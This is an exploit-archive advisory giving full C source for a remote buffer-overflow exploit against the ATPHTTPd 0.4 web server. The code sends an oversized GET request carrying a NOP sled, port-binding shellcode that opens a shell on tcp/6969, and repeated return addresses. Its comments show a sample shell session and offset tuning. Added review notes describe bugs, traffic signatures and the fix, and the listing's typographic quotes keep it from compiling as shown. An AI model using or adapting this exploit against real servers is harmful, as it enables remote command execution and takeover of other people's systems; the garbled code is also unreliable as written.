ATPHTTPd Buffer Overflow Exploit Code

Summary

ATPHTTPd, a tiny, caching, high-performance web server, suffers from a buffer overflow that allows remote command execution. The following exploit code can be used to test for this vulnerability.

Credit:

The information has been provided by Methodic.


Details

Vulnerable systems:
ATPHTTPd version 0.4

Exploit:
/* remote exploit for ATPhttpd 0.4 */
/* www: $Id: atphttpd-smack.c,v 1.2 2001/12/16 22:00:57 dmuz Exp $ */
/* $_Id: atphttpd-smack.c,v 1.27 2001/12/15 08:28:24 methodic Exp $ */

/* Another 31336++ codez from AngryPacket */

/*
 * ‘Tamer Sahin’ <ts@securityoffice.net> posted to BUGTRAQ that there
 * was a DoS condition in ATPhttpd on 13 Dec 2001. I downloaded the
 * source for the hell of it. Ran ye old perl Ax4000|nc and did some
 * gdb’n and noticed that it said the return address was 0x41414141.
 * Well that speaks for itself…
 *
 * – dmuz@angrypacket.com
 */

/*
 * developed and tested against OpenBSD. exploit creates a port-binding
 * shell on the remote machine on port 6969 with the uid of the server.
 * try offsets between 5000 and -5000 with increments of 100. -200 worked
 * like a charm for me.
 *
 * ./atphttpd-smack -h 127.0.0.1 -p 80 -o -200
 * [methodic@vulnhost] [~]$ nc localhost 6969
 * whoami
 * methodic
 * id
 * uid=1009(methodic) gid=1009(methodic)
 * ^C punt!
 *
 * mad thankz to vegac who helped me with a lame bug i was over looking
 */

/* this exploit code by methodic with a little from dmuz */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>

/* 701 A’s to own the EIP */
#define LEN 900
#define NOP 0x90

/* port binding shellcode (6969/tcp) by noir */
/*
 * Opaque machine code supplied as 32-bit hex words; it cannot be audited
 * from this listing, so treat it as an untrusted blob. Per the author's
 * comments it opens a listener on 6969/tcp running with the server's uid.
 * Review note: the array carries no explicit terminator, but main()
 * measures it with strlen() on a (char *) view of it — that read runs past
 * the array unless a zero byte happens to be adjacent in memory (UB).
 */
long shellcode[]=
{
0x4151c931,0x51514151,0x61b0c031,0x078980cd,
0x4f88c931,0x0547c604,0x084f8902,0x0647c766,
0x106a391b,0x5004478d,0x5050078b,0x68b0c031,
0x016a80cd,0x5050078b,0x6ab0c031,0xc93180cd,
0x078b5151,0xc0315050,0x80cd1eb0,0xc9310789,
0x50078b51,0xb0c03150,0x4180cd5a,0x7503f983,
0x5b23ebef,0xc9311f89,0x89074b88,0x8d51044f,
0x078b5007,0xc0315050,0x80cd3bb0,0x5151c931,
0x01b0c031,0xd8e880cd,0x2fffffff,0x2f6e6962,
0x90416873
};

/*
 * Returns the current stack pointer of the *exploit* process (i386 only:
 * "movl %esp,%eax"). There is no return statement; the value reaches the
 * caller only because %eax is the return register under the platform ABI,
 * which is undefined behaviour in ISO C. main() uses this as a proxy for
 * the target's stack layout, hence the -o offset knob.
 * Page artifact: the quotes and dashes throughout this listing are
 * typographic (‘ ’ –), not ASCII, so the code does not compile as shown.
 */
unsigned long get_sp(void) {
  __asm__(‘movl %esp,%eax’);
}

/*
 * Entry point. Parses -h/-p/-o, connects to the target, builds a LEN-byte
 * request path (NOP sled, then the shellcode, then the rest of the buffer
 * holding a repeated 4-byte return address) and sends it as the target of a
 * single "GET ... HTTP/1.0" request. Exit status 1 on socket/connect
 * failure, 0 otherwise.
 *
 * From a detection standpoint the traffic is distinctive: one request whose
 * request-target is ~900 bytes, largely 0x90 runs and one repeated 4-byte
 * value, followed (on success) by a new listener on tcp/6969 on the server
 * host. The server-side fix is bounding the request-line copy.
 *
 * Review notes on this listing:
 *  - usage() is called before it is declared or defined (line below the
 *    getopt loop); that is an implicit declaration, invalid since C99.
 *  - offset is an int but is assigned from atol() and printed with %ld;
 *    the format/argument mismatch is UB on LP64.
 *  - the return-address fill loop assumes sizeof(long) == 4; on a 64-bit
 *    build the last iteration writes 8 bytes at index 896 of a 900-byte
 *    buffer.
 *  - malloc(), inet_addr() and send() results are not checked.
 */
int main(int argc, char *argv[]) {

  int sockfd=0, port=0, offset=0;
  int ch, i;
  long retaddr;
  char *host=NULL, http_request[LEN+20];
  char *payload, *ptr=(char *)&shellcode;   /* shellcode viewed as bytes */
  struct sockaddr_in s;

  /* -h target IP (dotted quad only, see inet_addr below), -p port,
   * -o offset subtracted from our own stack pointer. No default: branch,
   * so unknown options are silently ignored. */
  while ((ch = getopt(argc, argv, ‘h:p:o:’)) != -1) {
    switch (ch) {
      case ‘h’:
        host = optarg;
        break;
      case ‘p’:
        port = atoi(optarg);          /* not range-checked; htons() truncates to 16 bits */
        break;
      case ‘o’:
        offset = atol(optarg);        /* long narrowed into an int */
        break;
    }
  }

  printf(‘>> atphttpd 0.4b exploit, written by angrypacket security crewn’);
  if(!host) {
    usage(argv[0]);                   /* usage() exits; defined after main() with no prototype */
  }
  if(!port) {
    port = 80;                        /* default HTTP port */
  }

  /* setup socket structure */
  bzero(&s, sizeof(s));
  s.sin_family = AF_INET;
  s.sin_port = htons(port);
  /* inet_addr() does no DNS resolution (netdb.h is included but unused) and
   * returns INADDR_NONE on a malformed address; that result is not checked.
   * Its declaring header <arpa/inet.h> is not included here — presumably it
   * arrives transitively on the author's BSD; verify on other platforms. */
  s.sin_addr.s_addr = inet_addr(host);

  if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
    perror(‘ + socket’);
    exit(1);
  }

  if(connect(sockfd, (struct sockaddr *)&s, sizeof(s)) == -1) {
    perror(‘ + connect’);
    exit(1);
  }

  /* build c0dez.. */
  payload = (char *)malloc(LEN);      /* unchecked allocation; cast is unnecessary in C */

  /* Our own %esp minus the user offset stands in for the target's stack
   * address; only meaningful when target and attacker share OS/arch. */
  retaddr = get_sp() – offset;
  printf(‘ + building payload [retaddr: 0x%lx] [offset: %ld]n’, retaddr, offset);

  /* fill the buffer with return addr’s */
  /* One 4-byte store per iteration; relies on sizeof(long) == 4. */
  for(i = 0; i < LEN; i += 4)
    *(long *)&payload[i] = retaddr;

  /* fill in some NOPs */
  /* Overwrites the first (LEN/2)-100 = 350 bytes; i is left at 350. */
  for(i = 0; i < ((LEN/2) – 100); i++)
    *(payload + i) = NOP;

  /* copy the shellcode and terminate the payload string */
  /* strlen() on a long[] that has no terminator: reads past the array
   * unless a zero byte is adjacent (UB). The bytes between the copied
   * shellcode and LEN-1 keep the repeated return address. */
  memcpy(payload + i, ptr, strlen(ptr));
  payload[LEN-1] = ‘’;                /* NUL terminator (character constant garbled on this page) */

  /* Request = "GET " (4) + payload (LEN-1) + " HTTP/1.0\r\n\r\n" (13) = LEN+16,
   * which fits the LEN+20 buffer. */
  bzero(&http_request, LEN+20);
  strcpy(http_request, ‘GET ‘);
  strcat(http_request, payload);
  strcat(http_request, ‘ HTTP/1.0rnrn’);
  free(payload);

  printf(‘ + sending payload to <%s> on port [%d].. ‘, host, port);
  send(sockfd, http_request, strlen(http_request), 0);   /* return value (short send / error) ignored */
  printf(‘donen’);
  close(sockfd);

  printf(‘ + now connect to port 6969 on <%s> (be good!)n’, host);
  printf(‘>> visit http://sec.angrypacket.com for more security toolsn’);

  return(0);

}

/*
 * Prints the command-line synopsis to stderr and terminates the process.
 * Called from main() before this definition and with no prototype in
 * scope (implicit declaration, invalid since C99). It exits with status 0,
 * so a wrapper script cannot tell a usage error from success. The stray
 * ’ after the closing brace is a page artifact, not code.
 */
int usage(char *progname) {
  fprintf(stderr, ‘usage: %s -h <target ip> -p <target port> -o <offset>n’, progname);
  exit(0);
}’
